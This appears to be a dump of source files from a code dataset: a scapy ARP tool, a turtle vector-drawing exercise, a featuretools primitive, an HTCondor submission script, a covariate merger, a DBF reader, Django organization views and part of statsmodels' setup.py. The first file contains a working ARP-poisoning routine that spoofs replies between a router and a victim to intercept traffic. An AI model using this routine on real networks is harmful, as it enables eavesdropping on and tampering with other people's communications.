index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
18,700 | 34f331f00941881a5466c7a99e51febad8bc9aa0 | #!/usr/bin/env python
import sh
import re
import argh
import time
import signal
import logging
import itertools
from scapy.all import *
import utils
def _arp_registered_MAC(ip, interface=Ether):
    """Resolve ``ip`` to a MAC address with an ARP who-has probe.

    Returns the ``src`` field of the ``interface`` layer of the answer, or
    ``None`` when nothing answered.  The original indexed the answered list
    unconditionally, so an unanswered probe raised IndexError and the
    callers' ``if not mac`` fallbacks never got a chance to run.
    """
    answered = srp(ARP(pdst=ip), timeout=5, retry=3)[0]
    try:
        return answered[1][interface].src
    except IndexError:
        # No (or too few) replies within the timeout.
        return None
def _load_mac_table():
    """Parse ``arp -a`` output into ``{interface: [(ip, mac), ...]}``."""
    entry_re = re.compile(r' \((\d+\.\d+\.\d+.\d+)\) at ([0-9a-f:]{17}) \[[\w]+\] on (\w+)')
    table = {}
    for line in sh.arp('-a'):
        hit = entry_re.search(line)
        if hit is None:
            # Lines such as "incomplete" entries do not match; skip them.
            continue
        addr, hwaddr, iface = hit.groups()
        table.setdefault(iface, []).append((addr, hwaddr))
    return table
def poison(routerIP, victimIP, attackerIP, interface='eth0'):
    """ARP-poison the victim and the router so their traffic transits us.

    All three MACs are resolved up front; if any resolution fails the
    function logs a detailed error and returns without poisoning.  While
    running, IP forwarding is enabled and poisoned replies are re-sent
    every 2 seconds so the cache entries never expire.  On SIGINT the
    genuine router<->victim mappings are re-announced to heal the network.

    NOTE(review): ``interface`` is accepted but never used -- confirm
    whether it was meant to be passed to send()/srp().
    NOTE(review): the poisoning replies set ``hwdst=attackerMAC`` and
    ``hwsrc`` to the *real* MACs, whereas a classic poison spoofs
    ``hwsrc`` as the attacker's MAC -- verify this is intentional.
    """
    routerMAC = _arp_registered_MAC(routerIP)
    victimMAC = _arp_registered_MAC(victimIP)
    attackerMAC = _arp_registered_MAC(attackerIP)
    if not routerMAC or not victimMAC or not attackerMAC:
        logging.error('''Could not determine all parties MACs:\n
\t router IP: {rip} \t MAC: {rmac} \n
\t victim IP: {vip} \t MAC: {vmac} \n
\t attacker IP: {aip} \t MAC: {amac} \n
'''.format(rip=routerIP, rmac=routerMAC,
vip=victimIP, vmac=victimMAC,
aip=attackerIP, amac=attackerMAC))
        return

    def _signal_handler(signal, frame):
        # Restore the genuine ARP entries (op=2 "is-at" with real MACs).
        send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC, hwsrc=routerMAC))
        send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC, hwsrc=victimMAC))

    with utils.ip_forwarding():
        signal.signal(signal.SIGINT, _signal_handler)
        while True:
            # op=2 is an unsolicited "is-at" reply; re-sent periodically so
            # the poisoned ARP cache entries do not time out.
            send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=attackerMAC, hwsrc=victimMAC), count=3)
            send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=attackerMAC, hwsrc=routerMAC), count=3)
            time.sleep(2)
def monitor(interface=None):
try:
table = dict(itertools.chain(*_load_mac_table().values()))
except:
table = {}
def fn(packet):
if not packet[ARP].op == 2:
return
ip, mac = packet[ARP].psrc, packet[ARP].hwsrc
msg = "Response: \t %s \t has address \t %s" % (ip, mac)
if table.get(ip):
if table[ip] != mac:
logging.warn('%s \t > Differ from current arp table' % msg)
print '%s > %s' % (ip, mac)
else:
logging.info('%s \t > Already on arp table' % msg)
else:
logging.info('%s \t > New to arp table' % msg)
table[ip] = mac
sniff_fn = sniff if not interface else functools.partial(sniff, iface=interface)
sniff_fn(filter='arp', prn=fn, store=0)
def display(interface=None):
for iface, entries in _load_mac_table().items():
if interface and iface != interface:
continue
print 'Interface %s (%i items)' % (iface, len(entries))
for ip, mac in sorted(entries):
print '\t %s \t %s' % (ip, mac)
print
def flush(ip=None, interface=None):
    """Delete ARP entries: a single IP, one interface's worth, or all."""
    if ip:
        targets = [(ip, None)]
    else:
        table = _load_mac_table()
        if interface:
            targets = table.get(interface, [])
        else:
            targets = itertools.chain(*table.values())
    for addr, _ in targets:
        sh.arp('-d', addr)
        logging.info('Flushed %s' % addr)
if __name__ == '__main__':
    # Raw ARP injection and `arp -d` both require root.
    utils.assure_root()
    utils.config_graceful_exit()
    # Silence scapy's noisy runtime warnings.
    logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
    argh.dispatch_commands([poison, flush, monitor, display])
|
18,701 | a7746f00dff50550818a97465ffa8bcbb063aa0e | #encoding: UTF-8
#Blanca Flor Caldern Vazquez
#vectores
from Graphics import*
from math import*
#Con esta función convertiremos radianes a grados
def convertirRadianesAGrados(rad):
    """Convert an angle from radians to degrees.

    Fix: uses ``pi`` (already in scope via ``from math import*``) instead
    of the truncated literal 3.1416, which introduced a rounding error.
    """
    grados = (rad * 180) / pi
    return grados
def main():
    # Read the vector's magnitude and angle from the user.
    # NOTE(review): the prompt asks for an angle, but the value is passed
    # through convertirRadianesAGrados (radians -> degrees); confirm the
    # expected input unit against Graphics.Arrow.rotate()'s convention.
    magnitud = int(input("ingresa la magnitud"))
    angulo = int(input("ingresa el ángulo"))
    anguloG = convertirRadianesAGrados(angulo)
    # 800x800 top-down window; first draw the two axes through the centre,
    # then orient the arrow and draw the vector itself.
    v = Window("Top-Down", 800, 800)
    t = Arrow((0, 400), 90)
    t.penDown()
    t.draw(v)
    t.forward(800)          # horizontal axis
    t.penUp()
    t.rotate(180)
    t.forward(400)          # back to the centre
    t.rotate(90)
    t.penDown()
    t.forward(400)          # vertical axis, first half
    t.rotate(180)
    t.forward(800)          # vertical axis, second half
    t.penUp()
    t.rotate(90)
    t.penDown()
    t.rotate(anguloG)       # orient by the converted angle
    t.forward(magnitud)     # draw the vector
main()
|
18,702 | a3df5ede027d59fcfc95019c939dbc04a27e9f15 | import numpy as np
from woodwork.column_schema import ColumnSchema
from woodwork.logical_types import Boolean, BooleanNullable, IntegerNullable
from featuretools.primitives.base.aggregation_primitive_base import AggregationPrimitive
from featuretools.utils.gen_utils import Library, import_or_none
dd = import_or_none("dask.dataframe")
class NumTrue(AggregationPrimitive):
    """Counts the number of `True` values.
    Description:
        Given a list of booleans, return the number
        of `True` values. Ignores 'NaN'.
    Examples:
        >>> num_true = NumTrue()
        >>> num_true([True, False, True, True, None])
        3
    """

    name = "num_true"
    # Accepts a plain Boolean column or a nullable Boolean column.
    input_types = [
        [ColumnSchema(logical_type=Boolean)],
        [ColumnSchema(logical_type=BooleanNullable)],
    ]
    # Nullable integer: the count may be missing for all-null groups.
    return_type = ColumnSchema(logical_type=IntegerNullable, semantic_tags={"numeric"})
    default_value = 0
    stack_on = []
    stack_on_exclude = []
    compatibility = [Library.PANDAS, Library.DASK]
    description_template = "the number of times {} is true"

    def get_function(self, agg_type=Library.PANDAS):
        """Return the aggregation callable for the requested backend.

        Dask needs an explicit two-phase aggregation (per-partition chunk
        sums, then a sum over chunk results); pandas can use np.sum directly.
        """
        if agg_type == Library.DASK:

            def chunk(s):
                chunk_sum = s.agg(np.sum)
                if chunk_sum.dtype == "bool":
                    # Summing an all-bool chunk yields bool; cast so the
                    # cross-partition aggregation adds counts instead of
                    # OR-ing truth values.
                    chunk_sum = chunk_sum.astype("int64")
                return chunk_sum

            def agg(s):
                return s.agg(np.sum)

            return dd.Aggregation(self.name, chunk=chunk, agg=agg)

        return np.sum
|
18,703 | 4ef75d1e7be011187a6ec409e4d7681b26a825b1 | #!/usr/bin/env python
from __future__ import print_function, division
from collections import defaultdict, OrderedDict
import warnings
import concurrent.futures
import gzip
import pickle
import json
import time
import numexpr
import os
from optparse import OptionParser
import uproot, uproot_methods
import numpy as np
from coffea import hist
# Command-line options: which datasets to (re)submit, which processor to
# run, and which cluster (lpc or kisti) to target.
parser = OptionParser()
parser.add_option('-d', '--dataset', help='dataset', dest='dataset', default='')
parser.add_option('-e', '--exclude', help='exclude', dest='exclude', default='')
parser.add_option('-p', '--processor', help='processor', dest='processor', default='')
parser.add_option('-m', '--metadata', help='metadata', dest='metadata', default='')
parser.add_option('-c', '--cluster', help='cluster', dest='cluster', default='lpc')
parser.add_option('-t', '--tar', action='store_true', dest='tar')
parser.add_option('-x', '--copy', action='store_true', dest='copy')
(options, args) = parser.parse_args()

# Create the condor stdout/stderr/log directories for this processor.
os.system('mkdir -p hists/'+options.processor+'/run_condor/out hists/'+options.processor+'/run_condor/err hists/'+options.processor+'/run_condor/log')

if options.tar:
    # Repack the analysis code and user-local python packages that the
    # worker nodes unpack at job start-up.
    os.system('tar --exclude-caches-all --exclude-vcs -czvf ../../decaf.tgz --exclude=\'analysis/hists/*/*____*\' --exclude=\'analysis/hists/*/*condor/*/*\' ../../decaf')
    os.system('tar --exclude-caches-all --exclude-vcs -czvf ../../pylocal.tgz -C ~/.local/lib/python3.6/ site-packages')

# NOTE(review): if --cluster is neither 'kisti' nor 'lpc', `jdl` is never
# assigned and the write below raises NameError.
if options.cluster == 'kisti':
    if options.copy:
        # Refresh the tarballs in the user's xrootd area (remove, then copy).
        os.system('xrdfs root://cms-xrdr.private.lo:2094/ rm /xrd/store/user/'+os.environ['USER']+'/decaf.tgz')
        print('decaf removed')
        os.system('xrdcp -f ../../decaf.tgz root://cms-xrdr.private.lo:2094//xrd/store/user/'+os.environ['USER']+'/decaf.tgz')
        os.system('xrdfs root://cms-xrdr.private.lo:2094/ rm /xrd/store/user/'+os.environ['USER']+'/pylocal.tgz')
        print('pylocal removed')
        os.system('xrdcp -f ../../pylocal.tgz root://cms-xrdr.private.lo:2094//xrd/store/user/'+os.environ['USER']+'/pylocal.tgz')
    jdl = """universe = vanilla
Executable = run.sh
Should_Transfer_Files = YES
WhenToTransferOutput = ON_EXIT
Transfer_Input_Files = run.sh, /tmp/x509up_u556950957
Output = hists/$ENV(PROCESSOR)/run_condor/out/$ENV(SAMPLE)_$(Cluster)_$(Process).stdout
Error = hists/$ENV(PROCESSOR)/run_condor/err/$ENV(SAMPLE)_$(Cluster)_$(Process).stderr
Log = hists/$ENV(PROCESSOR)/run_condor/log/$ENV(SAMPLE)_$(Cluster)_$(Process).log
TransferOutputRemaps = "$ENV(PROCESSOR)_$ENV(SAMPLE).futures=$ENV(PWD)/hists/$ENV(PROCESSOR)/$ENV(SAMPLE).futures"
Arguments = $ENV(METADATA) $ENV(SAMPLE) $ENV(PROCESSOR) $ENV(CLUSTER) $ENV(USER)
accounting_group=group_cms
JobBatchName = $ENV(BTCN)
request_cpus = 8
request_memory = 7000
Queue 1"""
if options.cluster == 'lpc':
    if options.copy:
        os.system('xrdcp -f ../../decaf.tgz root://cmseos.fnal.gov//store/user/'+os.environ['USER']+'/decaf.tgz')
        os.system('xrdcp -f ../../pylocal.tgz root://cmseos.fnal.gov//store/user/'+os.environ['USER']+'/pylocal.tgz')
    jdl = """universe = vanilla
Executable = run.sh
Should_Transfer_Files = YES
WhenToTransferOutput = ON_EXIT
Transfer_Input_Files = run.sh
Output = hists/$ENV(PROCESSOR)/run_condor/out/$ENV(SAMPLE)_$(Cluster)_$(Process).stdout
Error = hists/$ENV(PROCESSOR)/run_condor/err/$ENV(SAMPLE)_$(Cluster)_$(Process).stderr
Log = hists/$ENV(PROCESSOR)/run_condor/log/$ENV(SAMPLE)_$(Cluster)_$(Process).log
TransferOutputRemaps = "$ENV(PROCESSOR)_$ENV(SAMPLE).futures=$ENV(PWD)/hists/$ENV(PROCESSOR)/$ENV(SAMPLE).futures"
Arguments = $ENV(METADATA) $ENV(SAMPLE) $ENV(PROCESSOR) $ENV(CLUSTER) $ENV(USER)
request_cpus = 8
request_memory = 5700
Queue 1"""

# Write the submit description once; per-dataset values reach the jobs
# through environment variables referenced as $ENV(...) in the jdl.
jdl_file = open("run.submit", "w")
jdl_file.write(jdl)
jdl_file.close()

with open('metadata/'+options.metadata+'.json') as fin:
    datadef = json.load(fin)

for dataset, info in datadef.items():
    if options.dataset and options.dataset not in dataset: continue
    if options.exclude and options.exclude in dataset: continue
    # Clear this dataset's previous condor logs before resubmitting.
    os.system('rm -rf hists/'+options.processor+'/run_condor/err/'+dataset+'*')
    os.system('rm -rf hists/'+options.processor+'/run_condor/log/'+dataset+'*')
    os.system('rm -rf hists/'+options.processor+'/run_condor/out/'+dataset+'*')
    os.environ['SAMPLE'] = dataset
    os.environ['BTCN'] = dataset.split('____')[0]
    os.environ['PROCESSOR'] = options.processor
    os.environ['METADATA'] = options.metadata
    os.environ['CLUSTER'] = options.cluster
    os.system('condor_submit run.submit')

os.system('rm run.submit')
|
18,704 | e116bf6be28f8f7dda737466ae70d3a12a0b3d6b | #!/usr/bin/env python3
# Author: Francois Aguet
import pandas as pd
import argparse
import os
parser = argparse.ArgumentParser(description='Combine covariates into a single matrix')
parser.add_argument('genotype_pcs', help='')
parser.add_argument('expression_covariates', help='')
parser.add_argument('prefix', help='')
parser.add_argument('--add_covariates', default=[], nargs='+', help='')
parser.add_argument('-o', '--output_dir', default='.', help='Output directory')
args = parser.parse_args()

#print('Combining covariates ... ', end='', flush=True)
# Everything is read as str so values pass through verbatim (no float
# reformatting on write).
expression_df = pd.read_csv(args.expression_covariates, sep='\t', index_col=0, dtype=str)
genotype_df = pd.read_csv(args.genotype_pcs, sep='\t', index_col=0, dtype=str)
# Stack covariate rows, restricting each input to the expression matrix's
# columns (and column order) -- assumes those columns (presumably sample
# IDs; confirm) exist in every file.
combined_df = pd.concat([genotype_df[expression_df.columns], expression_df], axis=0)
for c in args.add_covariates:
    additional_df = pd.read_csv(c, sep='\t', index_col=0, dtype=str)
    combined_df = pd.concat([combined_df, additional_df[expression_df.columns]], axis=0)
combined_df.to_csv(os.path.join(args.output_dir, args.prefix+'.combined_covariates.txt'), sep='\t')#, float_format='%.6g')
print('done.')
|
18,705 | 08c00415290331e645b06750daecde591f3ea37b | from dbf_rw import dbfreader
from pprint import pprint
from bz2 import BZ2File
ENCODING_DBF = 'cp1252'  # NOTE(review): defined but never used below
# Read the compressed DBF directly from the bz2 archive.
arq_dbf = BZ2File('BR_Localidades_2010_v1.dbf.bz2')
localidades = dbfreader(arq_dbf)
nomes = []
tipos = []
# dbfreader apparently yields the field names first, then the field types,
# then the records (TODO confirm against dbf_rw); only the two header rows
# are wanted here.
for i, loc in enumerate(localidades):
    if i == 0:
        nomes = loc
    elif i == 1:
        tipos = loc
    else:
        break
# NOTE(review): under Python 3 this prints a zip object, not the pairs --
# wrap in list() if the pair listing is the intent (works as-is on Python 2).
pprint(zip(nomes, tipos))
|
18,706 | f7d70483a676cbfbf5f98ef7f1c97d8a50ee2e29 | from dal import autocomplete
from django.shortcuts import get_object_or_404
from django.db.models import Q
from django.utils.safestring import mark_safe
from django.views.generic import (
TemplateView,
DetailView,
ListView,
FormView,
)
import django_tables2 as tables
from django_filters.views import FilterView
from django_tables2.views import SingleTableMixin
from django_tables2.export.views import ExportMixin
from openrepairplatform.tables import FeeTable, MemberTable, EventTable
from openrepairplatform.filters import FeeFilter, MemberFilter, EventFilter
from openrepairplatform.user.mixins import PermissionOrgaContextMixin
from openrepairplatform.mixins import HasActivePermissionMixin
from openrepairplatform.user.models import (
CustomUser,
Organization,
Fee
)
from openrepairplatform.event.models import Event, Activity, Place
from openrepairplatform.user.forms import (
CustomUserEmailForm,
CustomUserSearchForm,
MoreInfoCustomUserForm,
)
from openrepairplatform.event.forms import (
EventSearchForm
)
from django.db.models import Count
from datetime import datetime
EVENTS_PER_PAGE = 6
class HomeView(TemplateView, FormView):
    """Landing page: site-wide counters plus a searchable list of
    upcoming published events."""

    form_class = EventSearchForm
    template_name = "home.html"

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context["search_form"] = EventSearchForm(self.request.GET)
        context["event_count"] = Event.objects.all().count()
        context["user_count"] = CustomUser.objects.all().count()
        context["organization_count"] = Organization.objects.all().count()
        context["results_number"] = self.get_queryset().count()
        return context

    def get_queryset(self):
        """Upcoming published events, narrowed by the GET search form."""
        events = Event.future_published_events()
        form = EventSearchForm(self.request.GET)
        if not form.is_valid():
            return events
        # (form field, ORM lookup) pairs; empty form values are skipped.
        criteria = (
            ("place", "location"),
            ("organization", "organization"),
            ("activity", "activity"),
            ("starts_before", "date__lte"),
            ("starts_after", "date__gte"),
        )
        for field, lookup in criteria:
            value = form.cleaned_data[field]
            if value:
                events = events.filter(**{lookup: value})
        return events
class OrganizationPageView(PermissionOrgaContextMixin, DetailView):
    """Public landing page of a single organization."""
    model = Organization
    template_name = "organization_page.html"

    def get_object(self, *args, **kwargs):
        # Looked up by the URL slug; cached on the view for reuse below.
        self.organization = Organization.objects.get(
            slug=self.kwargs["orga_slug"]
        )
        return self.organization

    def get_context_data(self, *args, **kwargs):
        context = super().get_context_data(*args, **kwargs)
        activities = Activity.objects.filter(organization=self.organization).annotate(category_count=Count('category')
        ).order_by('-category_count')
        # NOTE(review): the -category_count ordering above is discarded by
        # order_by('category__name') here -- confirm which is intended.
        context ["activities_list"] = activities.order_by('category__name')
        context["future_event"] = Event.future_published_events().filter(
            organization=self.organization).order_by('date')
        # Template navigation state.
        context["page_tab"] = 'active'
        context["organization_menu"] = 'active'
        return context
class OrganizationEventsView(
    PermissionOrgaContextMixin,
    ExportMixin,
    tables.SingleTableMixin,
    FilterView,
):
    """All events of one organization as a filterable, exportable table."""
    model = Organization
    template_name = "organization_events.html"
    context_object_name = "events"
    table_class = EventTable
    filterset_class = EventFilter
    paginate_by = 20
    dataset_kwargs = {"title": "Event"}
    form_class = EventSearchForm

    def get_queryset(self):
        orga_slug = self.kwargs.get("orga_slug")
        organization = get_object_or_404(Organization, slug=orga_slug)
        self.object = organization
        # Newest events first.
        return organization.events.order_by("-date")

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        organization = Organization.objects.get(slug=self.kwargs.get("orga_slug"))
        # Template navigation state.
        context["events_tab"] = 'active'
        context["organization_menu"] = 'active'
        context["organization"] = organization
        context["search_form"] = self.form_class
        # Count after applying the GET filters, so the template can show
        # the number of results for the current filter state.
        filtered_data = EventFilter(self.request.GET, queryset=self.get_queryset().all())
        context["total_events"] = filtered_data.qs.count()
        context["today"] = datetime.date(datetime.now())
        context["future_event"] = Event.future_published_events().filter(
            organization=organization).order_by('date')
        return context
class OrganizationGroupsView(PermissionOrgaContextMixin, DetailView):
    """Admins / actives / volunteers management page of an organization."""
    model = Organization
    template_name = "organization_groups.html"

    def get_object(self, *args, **kwargs):
        self.organization = Organization.objects.get(
            slug=self.kwargs["orga_slug"]
        )
        return self.organization

    def get_context_data(self, *args, **kwargs):
        context = super().get_context_data(*args, **kwargs)
        # (display label, email) pairs used by the user-selection widgets.
        context["emails"] = [
            (f"{user.email} ({user.first_name} {user.last_name})", user.email)
            for user in CustomUser.objects.all()
        ]
        # Distinct auto_id prefixes keep the three forms' field ids unique
        # when they are all rendered on the same page.
        context["add_admin_form"] = CustomUserEmailForm(auto_id="id_admin_%s")
        context["add_active_form"] = CustomUserEmailForm(
            auto_id="id_active_%s"
        )
        context["add_volunteer_form"] = CustomUserEmailForm(
            auto_id="id_volunteer_%s"
        )
        context["add_member_form"] = MoreInfoCustomUserForm
        # Template navigation state.
        context["groups_tab"] = 'active'
        context["organization_menu"] = 'active'
        context["future_event"] = Event.future_published_events().filter(
            organization=self.organization).order_by('date')
        return context
class OrganizationMembersView(
    HasActivePermissionMixin,
    PermissionOrgaContextMixin,
    ExportMixin,
    tables.SingleTableMixin,
    FilterView
):
    """Filterable, exportable table of an organization's members.

    Fix: the class previously assigned ``paginate_by`` twice (20, then 40);
    only the later 40 ever took effect, so the dead duplicate is removed.
    """
    model = CustomUser
    template_name = "organization_members.html"
    context_object_name = "members"
    table_class = MemberTable
    filterset_class = MemberFilter
    paginate_by = 40
    dataset_kwargs = {"title": "Members"}

    def get_queryset(self):
        # self.organization is presumably set by HasActivePermissionMixin
        # (same pattern as the sibling views) -- confirm in that mixin.
        self.object = self.organization
        queryset = self.organization.members.all().order_by("last_name")
        return queryset

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        # Template navigation state.
        context["members_tab"] = 'active'
        context["organization_menu"] = 'active'
        context["organization"] = self.organization
        context["search_form"] = CustomUserSearchForm
        # (display label, email) pairs used by the member-add widgets.
        context["emails"] = [
            (f"{user.email} ({user.first_name} {user.last_name})", user.email)
            for user in CustomUser.objects.all()
        ]
        context["add_member_form"] = MoreInfoCustomUserForm
        context["future_event"] = Event.future_published_events().filter(
            organization=self.organization).order_by('date')
        return context
class OrganizationFeesView(
    HasActivePermissionMixin,
    PermissionOrgaContextMixin,
    ExportMixin,
    tables.SingleTableMixin,
    FilterView
):
    """Filterable, exportable accounting table of an organization's fees."""
    model = Fee
    template_name = "organization_fees.html"
    context_object_name = "fees"
    table_class = FeeTable
    filterset_class = FeeFilter
    paginate_by = 40
    dataset_kwargs = {"title": "Fees"}

    def get_queryset(self):
        self.object = self.organization
        # Newest first, excluding zero-amount fees.
        return self.model.objects.filter(
            organization=self.organization
        ).order_by("-date").exclude(amount=0)

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        # Template navigation state.
        context["accounting_tab"] = 'active'
        context["organization_menu"] = 'active'
        context["organization"] = self.organization
        filtered_data = FeeFilter(self.request.GET, queryset=self.get_queryset().all())
        # Total of the rows matching the current filters (generator instead
        # of building an intermediate list).
        context["total_fees"] = sum(fee.amount for fee in filtered_data.qs)
        context["future_event"] = Event.future_published_events().filter(
            organization=self.organization).order_by('date')
        return context
class OrganizationControlsView(
    HasActivePermissionMixin, PermissionOrgaContextMixin, DetailView
):
    """Admin "controls" page for an organization."""
    model = Organization
    template_name = "organization_controls.html"

    def get_object(self, *args, **kwargs):
        return self.model.objects.get(slug=self.organization.slug)

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        upcoming = Event.future_published_events().filter(
            organization=self.organization).order_by('date')
        context.update({
            "controls_tab": 'active',
            "organization_menu": 'active',
            "future_event": upcoming,
        })
        return context
class OrganizationDetailsView(PermissionOrgaContextMixin, DetailView):
    """Read-only details page for an organization, looked up by slug."""
    model = Organization
    template_name = "organization_details.html"

    def get_object(self, *args, **kwargs):
        return Organization.objects.get(slug=self.kwargs["orga_slug"])

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context.update({
            "organization": self.object,
            "organization_menu": 'active',
        })
        return context
#### autocomplete ####
class ActiveOrgaAutocomplete(HasActivePermissionMixin, autocomplete.Select2QuerySetView):
    """Autocomplete over an organization's actives, admins and volunteers."""
    def get_queryset(self, *args, **kwargs):
        orga_slug = self.kwargs.get("orga_slug")
        organization = get_object_or_404(Organization, slug=orga_slug)
        if not self.request.user.is_authenticated:
            # Anonymous users get nothing (avoid leaking member names).
            return CustomUser.objects.none()
        qs = organization.actives.all().union(
            organization.admins.all(), organization.volunteers.all()
        )
        if self.q:
            # NOTE(review): Django does not support .filter() on a union()
            # queryset and raises NotSupportedError -- confirm whether this
            # search path is ever exercised.
            qs = qs.filter(Q(first_name__icontains=self.q) | Q(last_name__icontains=self.q))
        return qs
class CustomUserAutocomplete(autocomplete.Select2QuerySetView):
    """Site-wide user autocomplete by name or e-mail (authenticated only)."""
    def get_queryset(self):
        if not self.request.user.is_authenticated:
            return CustomUser.objects.none()
        queryset = CustomUser.objects.all()
        term = self.q
        if term:
            name_or_email = (
                Q(first_name__icontains=term)
                | Q(last_name__icontains=term)
                | Q(email__icontains=term)
            )
            queryset = queryset.filter(name_or_email)
        return queryset

    def get_selected_result_label(self, item):
        # Markup consumed by the select2 widget for the chosen user.
        return f"<span class='selected-user' id={item.pk}/>{item}</span>"
class PlaceAutocomplete(autocomplete.Select2QuerySetView):
    """Autocomplete over places, matched on name or address."""
    def get_queryset(self):
        if not self.request.user.is_authenticated:
            return Place.objects.none()
        places = Place.objects.all().order_by("name")
        term = self.q
        if not term:
            return places
        return places.filter(Q(name__icontains=term) | Q(address__icontains=term))
class ActivityAutocomplete(autocomplete.Select2QuerySetView):
    """Autocomplete over activities, matched on name (authenticated only).

    Fix: dropped an unused ``future_events`` local that served no purpose.
    """
    def get_queryset(self):
        if not self.request.user.is_authenticated:
            return Activity.objects.none()
        qs = Activity.objects.all().order_by("name")
        if self.q:
            qs = qs.filter(name__icontains=self.q)
        return qs
|
18,707 | 19f66d9d63561df23f5f8469208c035be4b4e17a | """
To build with coverage of Cython files
export SM_CYTHON_COVERAGE=1
python -m pip install -e .
pytest --cov=statsmodels statsmodels
coverage html
"""
from setuptools import Command, Extension, find_packages, setup
from setuptools.dist import Distribution
from collections import defaultdict
import fnmatch
import inspect
import os
from os.path import dirname, join as pjoin, relpath
from pathlib import Path
import shutil
import sys
SETUP_DIR = Path(__file__).parent.resolve()

try:
    # SM_FORCE_C is a testing shim to force setup to use C source files
    FORCE_C = int(os.environ.get("SM_FORCE_C", 0))
    if FORCE_C:
        raise ImportError("Force import error for testing")
    from Cython import Tempita
    from Cython.Build import cythonize
    from Cython.Distutils import build_ext

    HAS_CYTHON = True
except ImportError:
    # Without Cython we build from the pre-generated C sources instead.
    from setuptools.command.build_ext import build_ext

    HAS_CYTHON = False

try:
    import numpy  # noqa: F401

    HAS_NUMPY = True
except ImportError:
    # numpy may only become available at build time; see DeferredBuildExt.
    HAS_NUMPY = False
###############################################################################
# Key Values that Change Each Release
###############################################################################
# These are strictly installation requirements. Builds requirements are
# managed in pyproject.toml
INSTALL_REQUIRES = []
with open("requirements.txt", encoding="utf-8") as req:
    for line in req.readlines():
        # Strip trailing "# comment" annotations from requirement lines.
        INSTALL_REQUIRES.append(line.split("#")[0].strip())

DEVELOP_REQUIRES = []
with open("requirements-dev.txt", encoding="utf-8") as req:
    for line in req.readlines():
        DEVELOP_REQUIRES.append(line.split("#")[0].strip())

CYTHON_MIN_VER = "0.29.26"  # released 2020
# Optional dependency sets selectable as e.g. statsmodels[docs].
EXTRAS_REQUIRE = {
    "build": ["cython>=" + CYTHON_MIN_VER],
    "develop": ["cython>=" + CYTHON_MIN_VER] + DEVELOP_REQUIRES,
    "docs": [
        "sphinx",
        "nbconvert",
        "jupyter_client",
        "ipykernel",
        "matplotlib",
        "nbformat",
        "numpydoc",
        "pandas-datareader",
    ],
}
###############################################################################
# Values that rarely change
###############################################################################
# Static distribution metadata passed through to setup() at the bottom.
DISTNAME = "statsmodels"
DESCRIPTION = "Statistical computations and models for Python"
README = SETUP_DIR.joinpath("README.rst").read_text()
LONG_DESCRIPTION = README
MAINTAINER = "statsmodels Developers"
MAINTAINER_EMAIL = "pystatsmodels@googlegroups.com"
URL = "https://www.statsmodels.org/"
LICENSE = "BSD License"
DOWNLOAD_URL = ""
PROJECT_URLS = {
    "Bug Tracker": "https://github.com/statsmodels/statsmodels/issues",
    "Documentation": "https://www.statsmodels.org/stable/index.html",
    "Source Code": "https://github.com/statsmodels/statsmodels",
}
CLASSIFIERS = [
    "Development Status :: 4 - Beta",
    "Environment :: Console",
    "Programming Language :: Cython",
    "Programming Language :: Python :: 3.8",
    "Programming Language :: Python :: 3.9",
    "Programming Language :: Python :: 3.10",
    "Operating System :: OS Independent",
    "Intended Audience :: End Users/Desktop",
    "Intended Audience :: Developers",
    "Intended Audience :: Science/Research",
    "Natural Language :: English",
    "License :: OSI Approved :: BSD License",
    "Topic :: Office/Business :: Financial",
    "Topic :: Scientific/Engineering",
]
# Non-Python files temporarily copied into the package tree so they ship in
# the distribution; they are deleted again after setup() runs (end of file).
FILES_TO_INCLUDE_IN_PACKAGE = ["LICENSE.txt", "setup.cfg"]
FILES_COPIED_TO_PACKAGE = []
for filename in FILES_TO_INCLUDE_IN_PACKAGE:
    if os.path.exists(filename):
        dest = os.path.join("statsmodels", filename)
        shutil.copy2(filename, dest)
        FILES_COPIED_TO_PACKAGE.append(dest)

STATESPACE_RESULTS = "statsmodels.tsa.statespace.tests.results"
# Per-package glob patterns of extra data files to package.
ADDITIONAL_PACKAGE_DATA = {
    "statsmodels": FILES_TO_INCLUDE_IN_PACKAGE,
    "statsmodels.datasets.tests": ["*.zip"],
    "statsmodels.iolib.tests.results": ["*.dta"],
    "statsmodels.stats.tests.results": ["*.json"],
    "statsmodels.tsa.stl.tests.results": ["*.csv"],
    "statsmodels.tsa.vector_ar.tests.results": ["*.npz", "*.dat"],
    "statsmodels.stats.tests": ["*.txt"],
    "statsmodels.stats.libqsturng": ["*.r", "*.txt", "*.dat"],
    "statsmodels.stats.libqsturng.tests": ["*.csv", "*.dat"],
    "statsmodels.sandbox.regression.tests": ["*.dta", "*.csv"],
    STATESPACE_RESULTS: ["*.pkl", "*.csv"],
    STATESPACE_RESULTS + ".frbny_nowcast": ["test*.mat"],
    STATESPACE_RESULTS + ".frbny_nowcast.Nowcasting.data.US": ["*.csv"],
}
##############################################################################
# Extension Building
##############################################################################
# Cython line-trace coverage is opt-in via the SM_CYTHON_COVERAGE env var.
CYTHON_COVERAGE = os.environ.get("SM_CYTHON_COVERAGE", False)
CYTHON_COVERAGE = CYTHON_COVERAGE in ("1", "true", '"true"')
CYTHON_TRACE_NOGIL = str(int(CYTHON_COVERAGE))
if CYTHON_COVERAGE:
    print("Building with coverage for Cython code")

COMPILER_DIRECTIVES = {"linetrace": CYTHON_COVERAGE}
DEFINE_MACROS = [
    ("CYTHON_TRACE_NOGIL", CYTHON_TRACE_NOGIL),
    ("NPY_NO_DEPRECATED_API", "NPY_1_7_API_VERSION"),
]

# Non-statespace extensions; ".pyx.in" sources are tempita templates that
# process_tempita() expands before cythonization.
exts = dict(
    _stl={"source": "statsmodels/tsa/stl/_stl.pyx"},
    _exponential_smoothers={
        "source": "statsmodels/tsa/holtwinters/_exponential_smoothers.pyx"
    },  # noqa: E501
    _ets_smooth={
